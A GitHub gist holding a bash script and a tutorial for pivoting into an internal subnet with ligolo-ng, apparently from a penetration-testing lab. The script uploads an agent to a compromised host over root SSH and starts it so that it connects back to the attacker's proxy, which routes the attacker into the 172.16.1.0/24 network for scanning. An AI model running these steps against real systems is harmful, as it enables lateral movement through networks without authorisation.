Skip to content

Instantly share code, notes, and snippets.

@V3ntus
Last active January 15, 2023 19:26
Show Gist options
  • Save V3ntus/51dfd92618caec546b4c9bf0601ae7b9 to your computer and use it in GitHub Desktop.
Save V3ntus/51dfd92618caec546b4c9bf0601ae7b9 to your computer and use it in GitHub Desktop.
How to tunnel with ligolo-ng
#!/bin/bash
# If you do not have ssh keys for root, remove all -i flag and $REMOTE_ROOT_KEYS instances from the script
REMOTE= # IP/hostname of remote target
REMOTE_ROOT_KEYS= # path to id_rsa of root user on remote target
LIGOLO_AGENT= # path to agent binary
LIGOLO_PROXY= # path to proxy binary
CURRENT_USER=$(whoami)
echo "[L] Uploading agent to remote..."
scp -i $REMOTE_ROOT_KEYS $LIGOLO_AGENT root@$REMOTE:/root/.ligolo_agent
echo "[L] Uploaded"
echo "[L] Setting up tun interface on this device..."
if [[ -z $(ifconfig | grep "ligolo") ]]; then
sudo ip tuntap add user $CURRENT_USER mode tun ligolo
sudo ip link set ligolo up
sudo ip route add 172.16.1.0/24 dev ligolo
fi
echo "[L] Starting agent on remote..."
VPN_IP=$(ifconfig tun0 | grep inet | grep -Eo "10.10.[0-9]{,2}.[0-9]{,3}" | head -1)
echo "[L] Got VPN IP: $VPN_IP"
ssh -i $REMOTE_ROOT_KEYS root@$REMOTE "echo '[R] Hello from remote. Connecting in 3 seconds'; sleep 3; /root/.ligolo_agent -connect $VPN_IP:11601 -ignore-cert" &
echo "[L] Starting proxy..."
echo "[L] Run 'session', select your session, then run 'start' to finish tunneling"
sudo $LIGOLO_PROXY -selfcert

Tunneling with Ligolo-ng

Setup

1. Download both agent and proxy from the releases here. Extract them someplace.

2. On your attacking machine, setup the ligolo tun interface:

sudo ip tuntap add user [your username] mode tun ligolo
sudo ip link set ligolo up
sudo ip route add [subnet network address]/[subnet CIDR] dev ligolo

For example, for my machine, I would type:

sudo ip tuntap add user ventus mode tun ligolo
sudo ip link set ligolo up
sudo ip route add 172.16.1.0/24 dev ligolo

Running

1. Start your proxy server on your attacking machine with:

sudo ./proxy -selfcert

If you get invalid domain/host name issues, you missed the “-selfcert” argument.

2. Now upload the agent binary to your compromised machine on the network. Connect to your proxy/C2 server with:

./agent -connect [your attacking machine's IP]:11601 -ignore-cert

Also note the “-ignore-cert” argument. You should see a connection in your proxy terminal.

3. You should see a connection in your attacking/proxy machine.

WARN[0000] Using automatically generated self-signed certificates (Not recommended) 
INFO[0000] Listening on 0.0.0.0:11601                   
    __    _             __                       
   / /   (_)___ _____  / /___        ____  ____ _
  / /   / / __ `/ __ \/ / __ \______/ __ \/ __ `/
 / /___/ / /_/ / /_/ / / /_/ /_____/ / / / /_/ / 
/_____/_/\__, /\____/_/\____/     /_/ /_/\__, /  
        /____/                          /____/   

Made in France ♥ by @Nicocha30!

ligolo-ng » INFO[0001] Agent joined.                                 name=root@DANTE-WEB-NIX01 remote="10.10.110.100:38078"

4. At your attacking/proxy machine, configure tunneling with this new session.

Enter session, hit Enter to select the newly created session, then hit start.

ligolo-ng » session
? Specify a session : 1 - root@DANTE-WEB-NIX01 - 10.10.110.100:38078
[Agent : root@DANTE-WEB-NIX01] » ifconfig
┌────────────────────────────┐
│ Interface 0                │
├──────────────┬─────────────┤
│ Name         │ lo          │
│ Hardware MAC │             │
│ MTU          │ 65536       │
│ Flags        │ up|loopback │
│ IPv4 Address │ 127.0.0.1/8 │
│ IPv6 Address │ ::1/128     │
└──────────────┴─────────────┘
┌────────────────────────────────────────────┐
│ Interface 1                                │
├──────────────┬─────────────────────────────┤
│ Name         │ eth0                        │
│ Hardware MAC │ 00:50:56:b9:9b:fe           │
│ MTU          │ 1500                        │
│ Flags        │ up|broadcast|multicast      │
│ IPv4 Address │ 172.16.1.100/24             │
│ IPv6 Address │ fe80::250:56ff:feb9:9bfe/64 │
└──────────────┴─────────────────────────────┘
[Agent : root@DANTE-WEB-NIX01] » start
[Agent : root@DANTE-WEB-NIX01] » INFO[0114] Starting tunnel to root@DANTE-WEB-NIX01 

Now you should be good to go!

You should be able to nmap the remote internal subnet without any issues or need for TCP flags.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment